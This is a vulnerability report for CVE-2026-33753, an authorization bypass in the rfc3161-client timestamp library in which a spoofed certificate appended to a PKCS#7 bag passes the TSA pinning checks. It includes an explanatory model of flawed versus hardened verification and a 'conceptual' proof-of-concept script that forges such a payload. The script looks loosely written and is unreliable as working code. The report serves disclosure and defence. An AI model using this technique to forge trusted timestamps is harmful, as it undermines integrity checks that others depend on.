Security Vulnerability Report
CVE-2026-33753 CVSS 6.2 MEDIUM

CVE-2026-33753

Published: 2026-04-08 16:16:24
Last Modified: 2026-04-21 18:12:20

Description

rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6.
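The flaw class described above, as an added example that is not rfc3161-client's code: a simplified model in which the authorization check and the signature check can each be satisfied by a different certificate in the bag, next to a version that binds both checks to the single certificate named by the SignerInfo `sid`. All class names, certificate values and the trust store are constructed for illustration.

```python
from dataclasses import dataclass

TIMESTAMPING_EKU = "1.3.6.1.5.5.7.3.8"   # id-kp-timeStamping
TRUSTED_ISSUERS = {"Trusted Root A", "Trusted Root B"}  # constructed trust store

@dataclass(frozen=True)
class Cert:                 # simplified stand-in for an X.509 certificate
    issuer: str
    serial: int
    common_name: str
    ekus: frozenset
    key_id: str             # stands in for the public key

@dataclass(frozen=True)
class Response:             # simplified stand-in for a CMS SignedData token
    sid: tuple              # SignerInfo sid: (issuer, serial)
    signing_key: str        # key that actually produced the signature
    bag: tuple              # the unordered `certificates` field

def policy_ok(cert, pinned_cn):
    """Authorization rules: pinned common name plus timestamping EKU."""
    return cert.common_name == pinned_cn and TIMESTAMPING_EKU in cert.ekus

def crypto_ok(cert, resp):
    """Signature made by this cert's key, and the cert chains to a trusted issuer."""
    return cert.key_id == resp.signing_key and cert.issuer in TRUSTED_ISSUERS

def verify_split(resp, pinned_cn):
    """Flawed pattern: each check may be satisfied by a different cert."""
    return (any(policy_ok(c, pinned_cn) for c in resp.bag)
            and any(crypto_ok(c, resp) for c in resp.bag))

def verify_bound(resp, pinned_cn):
    """Hardened pattern: one cert, chosen by sid, must pass every check."""
    signers = [c for c in resp.bag if (c.issuer, c.serial) == resp.sid]
    if len(signers) != 1:   # missing or ambiguous signer: reject
        return False
    return crypto_ok(signers[0], resp) and policy_ok(signers[0], pinned_cn)

# Constructed sample data (not taken from any real TSA)
eku = frozenset({TIMESTAMPING_EKU})
pinned_tsa = Cert("Trusted Root A", 1, "Pinned TSA", eku, "key-pinned")
other_tsa = Cert("Trusted Root B", 7, "Other TSA", eku, "key-other")
lookalike = Cert("Untrusted CA", 99, "Pinned TSA", eku, "key-lookalike")

genuine = Response(("Trusted Root A", 1), "key-pinned", (pinned_tsa,))
tampered = Response(("Trusted Root B", 7), "key-other", (lookalike, other_tsa))
```

With the pinned name `"Pinned TSA"`, both functions accept `genuine`; only `verify_split` accepts `tampered`, regardless of the order of the bag.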

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:trailofbits:rfc3161-client:*:*:*:*:*:*:*:* - VULNERABLE
rfc3161-client < 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-33753
# This script demonstrates the logic flaw where a spoofed certificate
# is added to a PKCS#7 bag to bypass authorization checks.

from cryptography.hazmat.primitives import serialization
from cryptography import x509
import asn1crypto

# 1. Load a valid TSA response (PKCS#7 SignedData)
# This contains a valid signature from a trusted TSA
with open('valid_tsa_response.der', 'rb') as f:
    p7_data = f.read()

# 2. Load attacker's spoofed certificate
# This cert has the required CN and EKU to pass policy checks
with open('spoofed_cert.pem', 'rb') as f:
    spoofed_cert = x509.load_pem_x509_certificate(f.read())

# 3. Parse the PKCS#7 structure
signed_data = asn1crypto.pkcs7.SignedData.load(p7_data)

# 4. Inject the spoofed certificate into the certificates bag
# The library fails to pick the correct leaf cert for verification
if 'certificates' not in signed_data:
    signed_data['certificates'] = asn1crypto.core.SetOf([])

# Convert spoofed cert to DER and add to the bag
spoofed_cert_der = spoofed_cert.public_bytes(serialization.Encoding.DER)
signed_data['certificates'].append(asn1crypto.x509.Certificate.load(spoofed_cert_der))

# 5. Re-encode the malicious PKCS#7 data
malicious_p7 = signed_data.dump()

# When rfc3161-client parses 'malicious_p7':
# - It extracts the spoofed cert and checks permissions (Pass)
# - It verifies the hash against the real TSA cert (Pass)
# - Result: Authorization Bypass
print("[+] Malicious PKCS#7 payload generated.")
```

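References

https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj (Exploit, Vendor Advisory)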

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33753", "sourceIdentifier": "[email protected]", "published": "2026-04-08T16:16:23.670", "lastModified": "2026-04-21T18:12:20.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. 
This vulnerability is fixed in 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trailofbits:rfc3161-client:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.6", "matchCriteriaId": "16E3C452-B9EE-490C-A46E-F8F8B8BB936A"}]}]}], "references": [{"url": "https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}